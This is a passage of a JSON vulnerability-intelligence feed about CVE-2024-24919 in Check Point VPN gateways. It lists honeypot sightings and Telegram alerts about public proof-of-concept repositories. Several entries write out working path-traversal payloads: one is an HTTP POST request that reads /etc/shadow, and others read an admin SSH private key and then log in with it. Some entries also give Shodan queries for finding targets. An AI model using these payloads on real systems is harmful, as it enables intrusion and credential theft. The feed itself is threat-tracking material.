"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "a3d166a6-8f60-454f-80a4-29666eb16732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "df525c15-02d3-4646-8f7c-b68f9718a86c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7467", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-24919 PoC\nURL\uff1ahttps://github.com/LucasKatashi/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T16:39:30.000000Z"}, {"uuid": "1ddef42b-e384-4ad1-8aaf-20093a4b1a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7502", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-24919\nURL\uff1ahttps://github.com/SpeedyQweku/ckpoint\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-02T21:46:38.000000Z"}, {"uuid": "d0db48f3-064a-42d9-9991-cd44dbd6d2e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7501", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-24919\nURL\uff1ahttps://github.com/SpeedyQweku/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-02T21:19:47.000000Z"}, {"uuid": "aef3532a-cc12-405f-80d3-3fca1829fca9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7496", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aa Proof of Concept of CVE-2024-24919\nURL\uff1ahttps://github.com/Expl0itD0g/CVE-2024-24919---Poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-02T14:00:10.000000Z"}, {"uuid": "163829e7-919a-4f1b-8e47-12aa86348a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7509", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aNmap script to check vulnerability CVE-2024-24919\nURL\uff1ahttps://github.com/GuayoyoCyber/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-03T18:20:43.000000Z"}, {"uuid": "ed8c5c88-016c-48c7-a303-d58cd8575d6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7489", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-24919 [Check Point Security Gateway Information Disclosure]\nURL\uff1ahttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-01T11:22:10.000000Z"}, {"uuid": "ec149e3a-750f-4959-95a8-6a46d23d0617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7490", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aEsta herramienta se utiliza para validar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall\nURL\uff1ahttps://github.com/r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-01T12:01:31.000000Z"}, {"uuid": "c1967358-a89c-4696-a8ab-6aa0bc46ac0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7488", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMass scanner for CVE-2024-24919\nURL\uff1ahttps://github.com/YN1337/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-01T09:58:18.000000Z"}, {"uuid": "401d5038-e238-4558-a64b-661d1bfef131", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7569", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCLI based PoC for CVE-2024-24919\nURL\uff1ahttps://github.com/3UR/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-08T06:31:02.000000Z"}, {"uuid": "f303cb70-4ba5-4aaa-8043-5d747dac3f53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7582", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPython script to automate the process of finding vulnerable sites for CVE-2024-24919.\nURL\uff1ahttps://github.com/protonnegativo/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-10T01:32:51.000000Z"}, {"uuid": "042634ad-05cb-462a-9179-29b2645eba0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7578", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024\u201324919 - Check Point Security Gateways\nURL\uff1ahttps://github.com/verylazytech/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-09T06:59:23.000000Z"}, {"uuid": "1b9f75f4-d536-48ed-8aa0-58274202db5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-09)", "content": "", "creation_timestamp": "2026-04-09T00:00:00.000000Z"}, {"uuid": "1f9b8d4c-5a1a-4ec3-8952-23513c5871d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-06)", "content": "", "creation_timestamp": "2026-04-06T00:00:00.000000Z"}, {"uuid": "c86beaed-0ae0-4486-a8b0-4499d559be1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/b6EibHArKu_kw6Oe-f5VpWCEg1w0yPlgEM89Z_onDzrOs1g", "content": "", "creation_timestamp": "2024-05-29T18:02:15.000000Z"}, {"uuid": "3d094d20-a436-4612-a26b-4e67f322dd06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-14)", "content": "", "creation_timestamp": "2026-04-14T00:00:00.000000Z"}, {"uuid": "88b83b04-be55-4942-8814-7ae6b3d8b532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "416f48d8-6e72-4b69-9127-7fdc4fd1e10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "cf589454-7b7b-4908-8de5-963f0d687317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "a23fcc1d-2f23-414e-97d5-35403638c9a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "d1ed4664-ae68-4b97-a18b-7b038819ccf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-13)", "content": "", "creation_timestamp": "2026-04-13T00:00:00.000000Z"}, {"uuid": "b96b30f5-2bbe-4f80-8f5d-a8886340012f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-16)", "content": "", "creation_timestamp": "2026-04-16T00:00:00.000000Z"}, {"uuid": "d2e32779-ad28-4934-937a-ae324d377067", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-15)", "content": "", "creation_timestamp": "2026-04-15T00:00:00.000000Z"}, {"uuid": "922a4426-211b-4993-8214-eb190663cbb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-16)", "content": "", "creation_timestamp": "2026-04-16T00:00:00.000000Z"}, {"uuid": "593f9316-5a58-45b6-b627-ff2de23342ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13012", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 \u2705CVE-2024-24919: Checkpoint Zero-Day VPN access. \n\naCSHELL/../../../../../../../\nhomepage/admin/.ssh/id_rsa\n*\nssh admin@Host -i id_rsa", "creation_timestamp": "2024-06-01T10:30:25.000000Z"}, {"uuid": "a66dec9c-8c99-4088-aa28-0f9e71062e80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8048", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aHello everyone, I am sharing a modified script from CVE-2024-24919 which can extract paths categorized as critical.\nURL\uff1ahttps://github.com/H3KEY/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-22T06:08:41.000000Z"}, {"uuid": "07db359f-fc46-4aa9-9eaa-23c7523be618", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-17)", "content": "", "creation_timestamp": "2026-04-17T00:00:00.000000Z"}, {"uuid": "40f8eee9-3ba1-4bc6-a5fe-cb364112a47a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-17)", "content": "", "creation_timestamp": "2026-04-17T00:00:00.000000Z"}, {"uuid": "12a09166-60b7-4aad-87e5-f9c9ef9f1aec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-18)", "content": "", "creation_timestamp": "2026-04-18T00:00:00.000000Z"}, {"uuid": "3b52aa3e-4596-447f-97c4-072580234174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-23)", "content": "", "creation_timestamp": "2026-04-23T00:00:00.000000Z"}, {"uuid": "016ffcb4-bb77-408c-a399-34575829e9ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7459", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aNuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.\nURL\uff1ahttps://github.com/botfather0x0/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T08:02:54.000000Z"}, {"uuid": "2f939134-df79-4992-a8d4-4bfd800d9357", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7505", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.\nURL\uff1ahttps://github.com/Rug4lo/CVE-2024-24919-Exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-03T14:06:42.000000Z"}, {"uuid": "a79c1729-2ca4-4107-bf34-710b6e3c684f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/hackingbra/145", "content": "CVE-2024-24919 Check Point Remote Access VPN 0-Day\n\naCSHELL/../../../../../../../\nhome/admin/.ssh/id_rsa\n*\nssh admin@host -i id_rsa", "creation_timestamp": "2024-05-31T03:48:22.000000Z"}, {"uuid": "c8842426-64da-4e6c-bd34-85d58915515d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8636", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC script for CVE-2024-24919 vulnerability. It scans a list of target URLs to identify security issues by sending HTTP POST requests and analyzing server responses\nURL\uff1ahttps://github.com/geniuszlyy/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-29T08:25:54.000000Z"}, {"uuid": "97e2e0a8-8ee5-4a8d-95ed-21eb389acaa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7465", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC exploit for CVE-2024-24919 information leakage \nURL\uff1ahttps://github.com/emanueldosreis/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T14:49:15.000000Z"}, {"uuid": "644b1745-4567-49c6-b410-e02c22a5adef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7476", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA simple bash and python script to check for the vulnerability CVE-2024-24919\nURL\uff1ahttps://github.com/satriarizka/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T09:07:05.000000Z"}, {"uuid": "5cd4fdd9-34f5-4a03-a6cd-608ba9aa3a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7533", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 Python exploitation utility\nURL\uff1ahttps://github.com/un9nplayer/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-05T16:14:26.000000Z"}, {"uuid": "d7e81a82-8940-460f-ac72-ddf960e9cfb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8872", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aIt's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd \nURL\uff1ahttps://github.com/sar-3mar/CVE-2024-24919_POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-28T21:57:09.000000Z"}, {"uuid": "4a4574c4-b670-4713-9284-0b90d89a7a36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7470", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aQuick and simple script that takes as input a file with multiple URLs to check for the CVE-2024-24919 vulnerability in CHECKPOINT\nURL\uff1ahttps://github.com/Bytenull00/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T20:17:20.000000Z"}, {"uuid": "11c125f6-f855-4029-8a3e-a0c790a74564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7468", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-24919 PoC\nURL\uff1ahttps://github.com/0bl1v10nf0rg0773n/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T17:02:46.000000Z"}, {"uuid": "b53deb47-8b38-4b0f-aea4-6be87e08bbbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/purple_medved/250", "content": "Check Point - You deserve the best security an arbitrary file read (CVE-2024-24919)\n\n\u041f\u043e\u0441\u043b\u0435 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0440\u044b\u0432\u0430 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043a \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u043c\u0443 \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0443\ud83d\ude0e \u0418 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u044e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043f\u0440\u043e \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0443\u044e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-24919 (\u043e\u0446\u0435\u043d\u043a\u0430 \u043f\u043e CVSS 3.1=8.6), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Check Point \u0441 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c\u0438 IPSec VPN, Remote Access VPN \u0438 Mobile Access.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 Watchtowr \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u044e\u0442 \u0434\u0435\u0442\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0441\u0443\u0442\u044c \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u043c path traversal \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\ud83d\ude48, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0435\u043c\u0443 \u043a \u0447\u0442\u0435\u043d\u0438\u044e \u043b\u044e\u0431\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0445\u0435\u0448\u0435\u0439 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, session tokens, \u0444\u0430\u0439\u043b\u043e\u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438.\n\nPOST /clients/MyCRL HTTP/1.1\nHost: target.com\nContent-Length: 41\n\naCSHELL/../../../../../../../etc/shadow\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0438 Censys \u043d\u0430 31.05 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e 13,802 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.\n\n\u2699\ufe0f POC: https://github.com/seed1337/CVE-2024-24919-POC\n\u2699\ufe0f Bulk Scanner: https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\ud83d\udd0e Shodan: title:\"Check Point\" || \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\" \n\ud83d\udd0e Fofa: app=\"Check_Point-SSL-Network-Extender\"\n\ud83d\udd0e Nuclei template: https://github.com/johnk3r/nuclei-templates/blob/c226ece895c8e4e6aec22aff66f21e5b8b70e08e/http/cves/2024/CVE-2024-24919.yaml\n\ud83d\udd0e IOCs: https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/\n\ud83e\udeb2 \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u041f\u041e: R77.20, R77.30, R80.10, R80.20, 